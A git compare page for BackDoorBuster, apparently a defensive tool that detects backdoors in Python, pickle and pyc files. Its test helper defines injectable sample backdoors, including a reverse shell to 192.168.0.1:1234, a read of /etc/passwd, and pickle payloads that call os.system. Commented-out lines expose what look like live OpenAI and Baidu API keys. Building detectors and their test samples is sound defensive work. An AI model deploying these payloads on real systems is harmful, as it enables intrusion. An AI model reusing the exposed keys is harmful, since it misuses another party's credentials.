Compare commits

..

17 Commits

Author SHA1 Message Date
c3ed3e166e Merge pull request 'tests/final-tests 完成最终代码' (#34) from tests/final-tests into main
Reviewed-on: #34
Reviewed-by: dqy <dqy@noreply.localhost>
2024-06-09 13:09:49 +08:00
f6fa95ba16 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-09 12:28:51 +08:00
94407e71b8 test:添加测试用例 2024-06-09 12:26:38 +08:00
dqy
2adb1cbc2e fix: 删除head 2024-06-06 17:14:47 +08:00
dqy
430d2b8f8a Merge branch 'fix/requirements-detection' into tests/final-tests 2024-06-06 16:21:03 +08:00
dqy
752e774714 fix: 修改正则匹配逻辑 2024-06-06 16:05:25 +08:00
dqy
373defc5bb feat: 将依赖检测添加到模组 2024-06-05 15:56:06 +08:00
dqy
c811e434c6 fix: 依赖报告输出格式修改 2024-06-05 10:46:42 +08:00
167bbe0a14 fix:修复文心一言的调用 2024-06-05 10:36:26 +08:00
e9b1e82492 feat:为llm常规添加并发,提高效率 2024-06-04 21:47:17 +08:00
a2651b499e chore: TODO preprocessing 2024-06-04 21:44:42 +08:00
a5f7665799 Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 21:10:13 +08:00
caeee4d179 fix:修复pickle结果输出 2024-06-04 21:09:43 +08:00
dqy
7198c8b4da Merge branch 'tests/final-tests' of https://git.mamahaha.work/sangge/BackDoorBuster into tests/final-tests 2024-06-04 20:58:35 +08:00
dqy
843c9d7ba3 feat: 修改依赖检测功能 2024-06-04 20:58:31 +08:00
dqy
cb30fddb1c feat: 修改pycdc默认路径 2024-06-04 20:58:14 +08:00
81cbc88e9b feat: update accurency formula 2024-06-04 20:31:09 +08:00
7 changed files with 436 additions and 352 deletions

View File

@@ -1,8 +1,11 @@
import json
import os
import threading
import time
from .utils import *
import openai
import signal
# import signal
class TimeoutException(Exception):
@@ -22,10 +25,10 @@ def detectGPT(content: str):
raise ValueError("env OPENAI_API_KEY no set")
# Set alarm timer
signal.signal(signal.SIGTERM, timeout_handler)
signal.alarm(10)
# signal.signal(signal.SIGTERM, timeout_handler)
# signal.alarm(10)
client = openai.OpenAI(base_url="https://api.xiaoai.plus/v1", api_key=api_key)
client = openai.OpenAI(base_url="https://api.kpi7.cn/v1", api_key=api_key)
text = content
# client = openai.OpenAI(api_key="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") #测试用key
response = client.chat.completions.create(
@@ -34,14 +37,16 @@ def detectGPT(content: str):
"role": "system",
"content": "You are a Python code reviewer.Read the code below and identify any potential security vulnerabilities. Classify them by risk level (high, medium, low, none). Only report the line number and the risk level.\nYou should output the result as json format in one line. For example: "
'[{"Line": {the line number}, "Risk": "{choose from (high,medium,low)}","Reason":"{how it is vulnable}"}] Each of these three field is required.\n'
"You are required to only output the json format. Do not output any other information.\n",
"You are required to only output the json format. Do not output any other information.请注意:只对有具体危害的代码片段判定为有风险。\n"
"For examples:\nos.system('ls'),subprocess.call(['ls', '-l']),subprocess.call([\"/bin/sh\",\"-i\"]),eval(code),exec(code) and so on.\n"
"Please IGNORE the risks that dont matter a lot.",
},
{
"role": "user",
"content": text,
},
],
model="gpt-3.5-turbo",
model="gpt-4o",
)
try:
message_content = response.choices[0].message.content
@@ -55,8 +60,8 @@ def detectGPT(content: str):
except TimeoutException:
raise TimeoutException("The api call timed out")
finally:
signal.alarm(0)
# finally:
# signal.alarm(0)
classified_results = {"high": [], "medium": [], "low": [], "none": []}
for res in res_json:
@@ -67,3 +72,34 @@ def detectGPT(content: str):
except IndexError:
pass
return classified_results
def GPTdetectFileList(fileList):
# print(len(fileList))
results = {"high": [], "medium": [], "low": [], "none": []}
threads = []
for file in fileList:
content = read_file_content(str(file))
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results)))
for thread in threads:
thread.start()
time.sleep(0.1)
for thread in threads:
thread.join()
return results
def GPTThread(filename, content, results):
try:
res = detectGPT(content)
# print(res)
for key in res:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{filename}: Line {line_num}", line)
for line_num, line in res[key]
]
)
except Exception as e:
print(e)

View File

@@ -34,6 +34,7 @@ def find_dangerous_functions(
r"\bos\.kill\b": "high",
r"\bos\.popen\b": "medium",
r"\bos\.spawn\b": "medium",
r"\bsubprocess": "medium",
},
}
risk_patterns = patterns.get(file_extension, {})
@@ -43,7 +44,9 @@ def find_dangerous_functions(
clean_line = remove_comments(line, file_extension)
if not clean_line:
continue
# 消除换行符,避免影响正则匹配
clean_line = clean_line.replace("\\n", "")
for pattern, risk_level in risk_patterns.items():
if re.search(pattern, clean_line):
if re.search(pattern, clean_line, re.MULTILINE | re.DOTALL):
classified_results[risk_level].append((line_number, clean_line))
return classified_results

View File

@@ -1,3 +1,4 @@
import json
import os
from typing import Dict, List, Tuple, Optional
from reportlab.lib.pagesizes import letter
@@ -5,8 +6,12 @@ from reportlab.lib.styles import getSampleStyleSheet
from reportlab.platypus import Paragraph, Spacer, SimpleDocTemplate
from detection.pickle_detection import pickleDataDetection
from .requirements_detection import requirement_detection
from .Regexdetection import find_dangerous_functions
from .GPTdetection import detectGPT
from .GPTdetection import detectGPT, GPTdetectFileList
# from .cngptdetection import detectGPT,GPTdetectFileList
from .pyc_detection import disassemble_pyc
from .utils import *
import sys
@@ -16,7 +21,7 @@ from pathlib import Path
PYCDC_FLAG = True
PYCDC_ADDR_FLAG = True
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc"}
SUPPORTED_EXTENSIONS = {".py", ".js", ".cpp", ".pyc",".pkl",".pickle"}
OUTPUT_FORMATS = ["html", "md", "txt", "pdf"]
ORDERS = [
"__import__",
@@ -28,6 +33,8 @@ ORDERS = [
"__getattribute__",
"getattr",
"child_process",
"kill",
"fork",
]
# Initialize colorama
@@ -104,9 +111,15 @@ def generate_text_content(results: Dict[str, List[Tuple[int, str]]]) -> str:
text_output = "Security Analysis Report\n"
text_output += "=" * 30 + "\n\n"
# text_output+= "chatGPT检测结果\n\n"
for risk_level, entries in results.items():
if entries and risk_level != "none":
# print(risk_level, entries)
if risk_level == "pickles":
text_output += f"Pickles:\n"
for i in entries:
text_output += f" {i['file']}:{json.dumps(i['result'])}\n"
elif entries and risk_level != "none":
risk_color = (
{
"high": Fore.RED,
@@ -361,9 +374,14 @@ def checkModeAndDetect(mode: str, filePath: str, fileExtension: str, pycdc_addr:
def process_path(
path: str, output_format: str, mode: str, pycdc_addr: str, output_file=None
path: str,
output_format: str,
mode: str,
pycdc_addr: str,
output_file=None,
requirement_path=None,
):
results = {"high": [], "medium": [], "low": [], "none": []}
results = {"high": [], "medium": [], "low": [], "none": [], "pickles": []}
if os.path.isdir(path):
# 使用rglob获取所有文件
all_files = [
@@ -371,37 +389,36 @@ def process_path(
for file_path in Path(path).rglob("*")
if file_path.suffix in SUPPORTED_EXTENSIONS
]
# 扫描动画
for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
file_extension = file_path.suffix
if file_extension in [".pkl",".pickle"]:
res = pickleDataDetection(str(file_path), output_file)
results["pickles"].append({
"file": str(file_path),
"result": res
})
continue
file_results = checkModeAndDetect(
mode, str(file_path), file_extension, pycdc_addr
)
if file_results is not None:
for key in file_results:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{file_path}: Line {line_num}", line)
for line_num, line in file_results[key]
]
)
print(all_files)
if mode == "llm":
results = GPTdetectFileList(all_files)
else:
# 扫描动画
for file_path in tqdm(all_files, desc="Scanning files", unit="file"):
file_extension = file_path.suffix
# print(file_extension)
if file_extension in [".pkl",".pickle"]:
# print("识别到pickle")
res = pickleDataDetection(str(file_path), output_file)
results["pickles"].append({"file": str(file_path), "result": res})
continue
file_results = checkModeAndDetect(
mode, str(file_path), file_extension, pycdc_addr
)
if file_results is not None:
for key in file_results:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{file_path}: Line {line_num}", line)
for line_num, line in file_results[key]
]
)
elif os.path.isfile(path):
file_extension = os.path.splitext(path)[1]
if file_extension in [".pkl", ".pickle"]:
res = pickleDataDetection(str(path), output_file)
results["pickles"].append({
"file": str(path),
"result": res
})
results["pickles"].append({"file": str(path), "result": res})
elif file_extension in SUPPORTED_EXTENSIONS:
file_results = checkModeAndDetect(mode, path, file_extension, pycdc_addr)
if file_results is not None:
@@ -419,7 +436,8 @@ def process_path(
else:
print("Invalid path.")
sys.exit(1)
if requirement_path is not None:
requirement_detection(requirement_path, output_file)
output_results(results, output_format, output_file)
@@ -438,7 +456,7 @@ def main():
"-p",
"--pycdc",
help="Path to pycdc.exe to decompile",
default=os.getenv("pycdc"),
default=os.getenv("PATH"),
)
parser.add_argument(
"-P",
@@ -446,12 +464,15 @@ def main():
help="Path to pickle file to analyze",
default=None,
)
parser.add_argument(
"-r",
"--requirement",
help="Path to requirement file to analyze",
default=None,
)
args = parser.parse_args()
output_format = "txt" # Default output format
output_file = None
if args.Pickle:
pickleDataDetection(args.Pickle, args.output)
return
if args.output:
_, ext = os.path.splitext(args.output)
ext = ext.lower()
@@ -464,7 +485,9 @@ def main():
)
output_file = args.output.rsplit(".", 1)[0] + ".txt"
# 如果未指定输出文件,则输出到 stdout否则写入文件
process_path(args.path, output_format, args.mode, args.pycdc, output_file)
process_path(
args.path, output_format, args.mode, args.pycdc, output_file, args.requirement
)
if PYCDC_FLAG == False:
print(
"ERROR: Detected Python 3.11 or above .pyc files. You need to install pycdc and compile it yourself to obtain pycdc."

View File

@@ -1,16 +1,21 @@
import os
import threading
import time
import requests
import re
import json
from typing import List, Dict, Any
from detection.utils import read_file_content
class TimeoutException(Exception):
"""自定义异常用于处理超时情况。"""
pass
def detectGPT(content: str) -> str:
def detectGPT(content: str,token:str):
"""
检测给定的代码内容中的潜在安全漏洞。
@@ -20,15 +25,8 @@ def detectGPT(content: str) -> str:
返回:
- 分类后的漏洞信息的JSON字符串。
"""
api_key = os.getenv("BAIDU_API_KEY")
secret_key = os.getenv("BAIDU_SECRET_KEY")
#api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa"
#secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7"
if not api_key or not secret_key:
raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + get_access_token(
api_key, secret_key)
url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/wenxinworkshop/chat/ernie-4.0-8k-0329?access_token=" + token
payload = json.dumps({
"messages": [
@@ -63,6 +61,7 @@ def detectGPT(content: str) -> str:
classified_results = {"high": [], "medium": [], "low": [], "none": []}
for res in extracted_data:
# print(res)
try:
line_number = int(res["Line"])
classified_results[res["Risk"]].append(
@@ -71,7 +70,7 @@ def detectGPT(content: str) -> str:
except (ValueError, IndexError, KeyError):
continue
return json.dumps(classified_results, indent=2, ensure_ascii=False)
return classified_results
def get_access_token(api_key: str, secret_key: str) -> str:
@@ -110,4 +109,41 @@ def extract_json_from_text(text: str) -> List[Dict[str, Any]]:
print(f"解码 JSON 时出错: {e}")
return []
return data
return data
def GPTdetectFileList(fileList):
api_key = os.getenv("BAIDU_API_KEY")
secret_key = os.getenv("BAIDU_SECRET_KEY")
# api_key = "DUBWNIrB6QJLOsLkpnEz2ZZa"
# secret_key = "9WK4HIV2n9r1ePPirqD4EQ6Ea33rH1m7"
if not api_key or not secret_key:
raise ValueError("BAIDU_API_KEY or BAIDU_SECRET_KEY is not set")
# print(len(fileList))
results = {"high": [], "medium": [], "low": [], "none": []}
threads = []
token = get_access_token(api_key, secret_key)
# print(token)
for file in fileList:
content = read_file_content(str(file))
threads.append(threading.Thread(target=GPTThread, args=(str(file), content, results,token)))
for thread in threads:
thread.start()
time.sleep(0.5)
for thread in threads:
thread.join()
return results
def GPTThread(filename, content, results,token):
res = detectGPT(content,token)
# print(res)
for key in res:
if key != "none": # Exclude 'none' risk level
results[key].extend(
[
(f"{filename}: Line {line_num}", line)
for line_num, line in res[key]
]
)

View File

@@ -1,279 +1,268 @@
import re
import os
import requests
import argparse
import requests
from bs4 import BeautifulSoup
from typing import List, Tuple, Optional
from packaging import version
from packaging.specifiers import SpecifierSet
from packaging.version import Version, InvalidVersion
import sys
from reportlab.lib.pagesizes import letter
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.lib.styles import getSampleStyleSheet, ParagraphStyle
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from colorama import Fore, Style, init
from tqdm import tqdm
import html
import os
def fetch_html(url: str) -> Optional[str]:
"""Fetch HTML content from the specified URL.
init(autoreset=True) # 初始化colorama并在每次打印后自动重置颜色
Args:
url (str): URL to fetch HTML from.
Returns:
Optional[str]: HTML content as a string, or None if fetch fails.
"""
response = requests.get(url)
if response.status_code == 200:
def fetch_html(url: str) -> str:
try:
response = requests.get(url)
response.raise_for_status()
return response.text
return None
except requests.RequestException as e:
print(f"Error fetching {url}: {e}")
return ""
def parse_html(html: str) -> List[Tuple[str, List[str]]]:
"""Parse HTML to get content of all 'a' and 'span' tags under the second 'td' of each 'tr'.
Args:
html (str): HTML content as a string.
Returns:
List[Tuple[str, List[str]]]: A list of tuples containing the text of 'a' tags and lists of 'span' texts.
"""
def parse_html(html: str) -> list:
soup = BeautifulSoup(html, "html.parser")
table = soup.find("table", id="sortable-table")
if not table:
return []
rows = table.find_all("tr", class_="vue--table__row")
results = []
if table:
rows = table.find("tbody").find_all("tr")
for row in rows:
tds = row.find_all("td")
if len(tds) >= 2:
a_tags = tds[1].find_all("a")
span_tags = tds[1].find_all("span")
spans = [span.text.strip() for span in span_tags]
for a_tag in a_tags:
results.append((a_tag.text.strip(), spans))
for row in rows:
info = {}
link = row.find("a")
chip = row.find("span", class_="vue--chip__value")
if link and chip:
info["link"] = link.get_text(strip=True)
info["chip"] = chip.get_text(strip=True)
results.append(info)
return results
def format_results(results: List[Tuple[str, List[str]]]) -> str:
"""Format extracted data as a string.
Args:
results (List[Tuple[str, List[str]]]): Extracted data to format.
Returns:
str: Formatted string of the extracted data.
"""
formatted_result = ""
for package_name, version_ranges in results:
formatted_result += f"Package Name: {package_name}\n"
formatted_result += "Version Ranges: " + ", ".join(version_ranges) + "\n"
formatted_result += "-" * 50 + "\n"
return formatted_result
def trans_vulnerable_packages(content):
"""将漏洞版本中的集合形式转换为大于小于的格式
Args:
content (str): 漏洞版本汇总信息.
"""
vulnerabilities = {}
blocks = content.split("--------------------------------------------------")
range_pattern = re.compile(r"\[(.*?),\s*(.*?)\)")
for block in blocks:
name_match = re.search(r"Package Name: (.+)", block)
if name_match:
package_name = name_match.group(1).strip()
ranges = range_pattern.findall(block)
specifier_list = []
for start, end in ranges:
if start and end:
specifier_list.append(f">={start},<{end}")
elif start:
specifier_list.append(f">={start}")
elif end:
specifier_list.append(f"<{end}")
if specifier_list:
vulnerabilities[package_name] = SpecifierSet(",".join(specifier_list))
return vulnerabilities
def format_vulnerabilities(vuln_packages):
"""将字典形式的漏洞信息格式化
Args:
vuln_packages (List[Tuple[str, List[str]]]): Extracted data to format.
"""
res = ""
for package, specifiers in vuln_packages.items():
res += f"Package Name: {package}\n"
res += f"Version Ranges: {specifiers}\n"
res += "-" * 50 + "\n"
return res
def load_requirements(filename):
"""从文件加载项目的依赖信息"""
with open(filename, "r", encoding="utf-8") as file:
lines = file.readlines()
requirements = {}
for line in lines:
if "==" in line:
package_name, package_version = line.strip().split("==")
requirements[package_name] = package_version
def load_requirements(file_path: str) -> list:
requirements = []
try:
with open(file_path, "r") as file:
for line in file:
line = line.strip()
if line and not line.startswith("#"):
requirements.append(line)
except FileNotFoundError:
print(f"Error: File {file_path} not found.")
sys.exit(1)
return requirements
def check_vulnerabilities(requirements, vulnerabilities, output_file):
"""检查依赖项是否存在已知漏洞,并输出结果"""
results_warning = [] # 存储有漏洞的依赖
results_ok = [] # 存储没有漏洞的依赖
for req_name, req_version in requirements.items():
if req_name in vulnerabilities:
spec = vulnerabilities[req_name]
if version.parse(req_version) in spec:
results_warning.append(
f"WARNING: {req_name}=={req_version} is vulnerable!"
)
else:
results_ok.append(f"OK: {req_name}=={req_version} is not affected.")
else:
results_ok.append(
f"OK: {req_name} not found in the vulnerability database."
)
# 合并结果,先输出所有警告,然后输出所有正常情况
results = results_warning + results_ok
# print(results)
if output_file:
filename, ext = os.path.splitext(output_file)
output_format = ext[1:] if ext[1:] else "txt"
if output_format not in ["txt", "md", "html", "pdf"]:
print("Warning: Invalid file format specified. Defaulting to TXT format.")
output_format = "txt" # 确保使用默认格式
output_file = filename + ".txt"
output_results(output_file, results, output_format)
def version_in_range(version, range_str: str) -> bool:
if version is not None:
try:
v = Version(version)
except InvalidVersion:
return False
else:
print("\n".join(results))
if range_str[-2] == ",":
return True
ranges = range_str.split(",")
for range_part in ranges:
range_part = range_part.strip("[]()")
if range_part:
try:
if range_part.endswith(")"):
upper = Version(range_part[:-1])
if v >= upper:
return False
elif range_part.startswith("["):
lower = Version(range_part[1:])
if v < lower:
return False
except InvalidVersion:
return False
return True
def trans_vulnerable_packages_to_dict(content):
"""将漏洞信息转换为字典格式
Args:
content str: 漏洞信息汇总.
def check_vulnerabilities(requirements: list, base_url: str) -> str:
results = []
for req in tqdm(requirements, desc="Checking vulnerabilities", unit="dependency"):
version = ""
if "==" in req:
package_name, version = req.split("==")
else:
package_name, version = req, None
url = f"{base_url}{package_name}"
# print(f"\nFetching data for {package_name} from {url}")
html_content = fetch_html(url)
if html_content:
extracted_data = parse_html(html_content)
if extracted_data:
relevant_vulns = []
for vuln in extracted_data:
if version_in_range(version, vuln["chip"]):
relevant_vulns.append(vuln)
if relevant_vulns:
result = f"Vulnerabilities found for {package_name}:\n"
for vuln in relevant_vulns:
result += f" - {vuln['link']}\n"
results.append(result)
return "\n".join(results)
def save_to_file(output_path: str, data: str):
if output_path.endswith(".html"):
save_as_html(output_path, data)
elif output_path.endswith(".pdf"):
save_as_pdf(output_path, data)
elif output_path.endswith(".md"):
save_as_markdown(output_path, data)
else:
save_as_txt(output_path, data)
def save_as_html(output_path: str, data: str):
escaped_data = html.escape(data)
html_content = f"""
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://s2.loli.net/2024/05/30/WDc6MekjbuCU9Qo.png">
<title>Vulnerability Report</title>
<style>
body {{
font-family: Arial, sans-serif;
background-image: url('https://s2.loli.net/2024/05/30/85Mv7leB2IRWNp6.jpg');
background-size: cover;
color: #333;
margin: 0;
padding: 0;
display: flex;
justify-content: center;
align-items: center;
height: 100vh;
}}
.container {{
background: rgba(255, 255, 255, 0.8);
border-radius: 10px;
padding: 20px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
max-width: 800px;
width: 100%;
margin: 20px;
overflow-y: auto;
max-height: 90vh;
}}
.title {{
font-size: 24px;
font-weight: bold;
text-align: center;
margin-bottom: 20px;
}}
pre {{
white-space: pre-wrap;
word-wrap: break-word;
font-size: 14px;
line-height: 1.5;
color: #333;
background: #f4f4f4;
padding: 10px;
border-radius: 5px;
border: 1px solid #ddd;
overflow: auto;
font-weight: bold;
}}
</style>
</head>
<body>
<div class="container">
<div class="title">Vulnerability Report</div>
<pre>{escaped_data}</pre>
</div>
</body>
</html>
"""
vulnerabilities = {}
blocks = content.split("--------------------------------------------------")
for block in blocks:
name_match = re.search(r"Package Name: (.+)", block)
range_match = re.search(r"Version Ranges: (.+)", block)
if name_match and range_match:
package_name = name_match.group(1).strip()
version_range = range_match.group(1).strip()
version_range = ",".join(
[part.strip() for part in version_range.split(",")]
)
vulnerabilities[package_name] = SpecifierSet(version_range)
return vulnerabilities
with open(output_path, "w", encoding="utf-8") as file:
file.write(html_content)
def output_pdf(results, file_name):
doc = SimpleDocTemplate(file_name, pagesize=letter)
def save_as_pdf(output_path: str, data: str):
doc = SimpleDocTemplate(output_path, pagesize=letter)
story = []
styles = getSampleStyleSheet()
# Custom styles
title_style = styles["Title"]
title_style.alignment = 1 # Center alignment
warning_style = ParagraphStyle(
"WarningStyle", parent=styles["BodyText"], fontName="Helvetica-Bold"
# Add the title centered
title_style = ParagraphStyle(
"Title",
parent=styles["Title"],
alignment=1, # Center alignment
fontSize=24,
leading=28,
spaceAfter=20,
fontName="Helvetica-Bold",
)
normal_style = styles["BodyText"]
# Add the title
title = Paragraph("Vulnerability Report", title_style)
story.append(title)
story.append(Spacer(1, 20)) # Space after title
# Iterate through results to add entries
for result in results:
if "WARNING:" in result:
# Add warning text in bold
entry = Paragraph(
result.replace("WARNING:", "<b>WARNING:</b>"), warning_style
)
else:
# Add normal text
entry = Paragraph(result, normal_style)
# Normal body text style
normal_style = ParagraphStyle(
"BodyText", parent=styles["BodyText"], fontSize=12, leading=15, spaceAfter=12
)
story.append(entry)
story.append(Spacer(1, 12)) # Space between entries
# Add the vulnerability details
for line in data.split("\n"):
if line.strip(): # Skip empty lines
story.append(Paragraph(line, normal_style))
doc.build(story)
def output_results(filename, results, format_type):
"""根据指定的格式输出结果"""
output_dir = os.path.dirname(filename)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with open(filename, "w", encoding="utf-8") as file:
if format_type == "html":
file.write("<html><head><title>Vulnerability Report</title></head><body>\n")
file.write("<h1>Vulnerability Report</h1>\n")
for result in results:
file.write(f"<p>{result}</p>\n")
file.write("</body></html>")
elif format_type == "md":
file.write("# Vulnerability Report\n")
for result in results:
file.write(f"* {result}\n")
elif format_type == "pdf":
output_pdf(results, filename)
else: # 默认为txt
for result in results:
file.write(f"{result}\n")
print("Results have been saved as " + filename)
def save_as_markdown(output_path: str, data: str):
with open(output_path, "w") as file:
file.write("## Vulnerability Report: \n\n")
file.write(data)
def main():
parser = argparse.ArgumentParser(
description="Check project dependencies for vulnerabilities."
)
parser.add_argument(
"requirements_file", help="Path to the requirements file of the project"
)
parser.add_argument(
"-o",
"--output",
help="Output file path with extension, e.g., './output/report.txt'",
)
args = parser.parse_args()
base_url = "https://security.snyk.io/vuln/pip/"
page_number = 1
crawler_results = ""
while True:
url = f"{base_url}{page_number}"
print(f"Fetching data from {url}")
html_content = fetch_html(url)
if not html_content:
print("No more data found or failed to fetch.")
break
extracted_data = parse_html(html_content)
if not extracted_data:
print("No relevant data found on page.")
break
crawler_results += format_results(extracted_data)
page_number += 1
print("Results have been stored in memory.\n")
trans_res = trans_vulnerable_packages(crawler_results)
trans_res = format_vulnerabilities(trans_res)
trans_res = trans_vulnerable_packages_to_dict(trans_res)
requirements = load_requirements(args.requirements_file)
check_vulnerabilities(requirements, trans_res, args.output)
def save_as_txt(output_path: str, data: str):
with open(output_path, "w") as file:
file.write("Vulnerability Report: \n\n")
file.write(data)
if __name__ == "__main__":
main()
def print_separator(title, char="-", length=50, padding=2):
print(f"{title:^{length + 4*padding}}") # 居中打印标题两侧各有padding个空格
print(char * (length + 2 * padding)) # 打印分割线两侧各有padding个字符的空格
def modify_file_name(file_path: str) -> str:
"""
Modify the file name by adding '-re' before the file extension.
Args:
file_path (str): The original file path.
Returns:
str: The modified file path.
"""
directory, file_name = os.path.split(file_path)
name, ext = os.path.splitext(file_name)
new_file_name = f"{name}-re{ext}"
new_file_path = os.path.join(directory, new_file_name)
return new_file_path
def requirement_detection(requirement_path, output_path=None):
base_url = "https://security.snyk.io/package/pip/"
requirements = load_requirements(requirement_path)
results = check_vulnerabilities(requirements, base_url)
if output_path is not None:
new_path = modify_file_name(output_path)
save_to_file(new_path, results)
print(f"Vulnerability scan complete. Results saved to {output_path}")
print(f"Requirements scan complete. Results saved to {new_path}")
else:
print_separator("\nVulnerability Report", "=", 40, 5)
print(results)

View File

@@ -63,69 +63,39 @@ def inject_random_backdoor(
# 示例1: 通过 os.system 执行命令
backdoor1 = """
import os
os.system('ls')
"""
backdoor1 = """import os
os.system('ls')"""
# 示例2: 通过 subprocess 模块执行命令
backdoor2 = """
import subprocess
subprocess.call(['ls', '-l'])
"""
backdoor2 = """import subprocess
subprocess.call(['ls', '-l'])"""
# 示例3: 打开一个反向 shell
backdoor3 = """
import socket,subprocess,os
backdoor3 = """import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
"""
subprocess.call(["/bin/sh","-i"])"""
# 示例4: 通过 eval 执行任意代码
backdoor4 = """
code = "print('Hello, World!')"
eval(code)
"""
backdoor4 = """code = "print('Hello, World!')"
eval(code)"""
# 示例5: 通过 exec 执行任意代码
backdoor5 = """
code = '''
backdoor5 = """code = '''
import os
os.system('ls')
'''
exec(code)
"""
exec(code)"""
# 示例6: 简单的 HTTP 服务器后门
backdoor6 = """
import http.server
import socketserver
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
"""
# 示例7: 读取并显示文件内容
backdoor7 = """
with open('/etc/passwd', 'r') as file:
backdoor7 = """with open('/etc/passwd', 'r') as file:
data = file.read()
print(data)
"""
print(data)"""
# 示例8: 无限循环
backdoor8 = """
while True:
print("This is a backdoor.")
"""
backdoors = [
backdoor1,
@@ -133,12 +103,15 @@ backdoors = [
backdoor3,
backdoor4,
backdoor5,
backdoor6,
backdoor7,
backdoor8,
]
backdoors_pickle = [
b'\x80\x03c__main__\nPerson\nq\x00)\x81q\x01}q\x02(X\x03\x00\x00\x00ageq\x03K\x12X\x04\x00\x00\x00nameq\x04X\x06\x00\x00\x00Pickleq\x05ub.',
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ub.',
b'cnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.',
b'\x80\x03c__main__\nUser\nq\x00)\x81q\x01}q\x02(X\x05\x00\x00\x00adminq\x03\x88X\x05\x00\x00\x00guestq\x04\x89ubcnt\nsystem\np0\n(Vcalc\np1\ntp2\nRp3\n.'
]
def inject_pickle_backdoor(root_path: str) -> None:
"""
Generate a pickle backdoor and insert it into the specified path.
@@ -149,8 +122,8 @@ def inject_pickle_backdoor(root_path: str) -> None:
all_path = [str(p) for p in Path(root_path).glob("*") if p.is_dir()]
paths = random.sample(all_path, random.randrange(1, len(all_path)))
for path in paths:
backdoor_id = random.randrange(0, len(backdoors))
backdoor = backdoors[backdoor_id]
backdoor_id = random.randrange(0, len(backdoors_pickle))
backdoor = backdoors_pickle[backdoor_id]
filename = os.path.join(path, f"backdoor{backdoor_id}.pickle")
with open(filename, "wb") as f:
pickle.dump(backdoor, f)
@@ -183,4 +156,4 @@ if __name__ == "__main__":
clone_dir = "/tmp/repo"
clone_repo(repo_url, clone_dir)
inject_random_backdoor(clone_dir)
inject_pickle_backdoor(clone_dir)
inject_pickle_backdoor(clone_dir)

View File

@@ -3,6 +3,7 @@ import unittest
import shutil
import os
import threading
import re
from detection.utils import read_file_content
from .final_tests_util import (
@@ -11,6 +12,7 @@ from .final_tests_util import (
inject_pickle_backdoor,
inject_random_backdoor,
inject_pyc_backdoor,
backdoors,
)
from detection.Regexdetection import find_dangerous_functions
from detection.GPTdetection import detectGPT
@@ -45,6 +47,10 @@ class TestFinalTests(unittest.TestCase):
clone_repo("https://github.com/TheAlgorithms/Python.git", "/tmp/Python")
shutil.copytree("/tmp/Python", self.path)
sampleRate = 0.1
# TODO
# preproccessing
self.inject_result = inject_random_backdoor(self.path, sample_rate=sampleRate)
self.pickle_true_num = inject_pickle_backdoor(self.path)
self.pyc_true_num = inject_pyc_backdoor(self.path)
@@ -102,11 +108,22 @@ class TestFinalTests(unittest.TestCase):
# test injected code
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
injected_detectedNum = 0
injected_detected_num = 0
injected_correct_num = 0
pattern = r"\w+\.py: Line \d+: (.+)"
for line in lines:
if "py:" in line:
injected_detectedNum += 1
injected_accurency = injected_detectedNum / self.injectedNum
injected_detected_num += 1
match = re.search(pattern, line)
command = ""
if match:
command = match.group(1)
for backdoor in backdoors:
if command in backdoor:
injected_correct_num += 1
break
injected_accurency = injected_detected_num / self.py_files_num
print(f"injected files accurency: {injected_accurency}")
try:
GPTresult = GPTdetectFileList(possibly_dangerous_file)
@@ -122,21 +139,28 @@ class TestFinalTests(unittest.TestCase):
# test pickle files
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
pickle_detectedNum = 0
pickle_detected_num = 0
pickle_correct_num = 0
for line in lines:
if "pickle" in line:
pickle_detectedNum += 1
pickle_accurency = pickle_detectedNum / self.pickle_files_num
pickle_detected_num += 1
if re.search(r"backdoor\d*\.pickle", line):
pickle_correct_num += 1
pickle_accurency = pickle_detected_num / self.pickle_true_num
print(f"pickle files accurency: {pickle_accurency}")
# test pyc files
with open(self.path + "output.txt", "r") as f:
lines = f.readlines()
pyc_detectedNum = 0
pyc_detected_num = 0
pyc_correct_num = 0
for line in lines:
if "pyc" in line:
pyc_detectedNum += 1
pyc_accurency = pyc_detectedNum / self.pyc_files_num
pyc_detected_num += 1
if re.search(r"backdoor\d*\.pyc", line):
pyc_correct_num += 1
pyc_accurency = pyc_detected_num / self.pyc_true_num
print(f"pyc files accurency: {pyc_accurency}")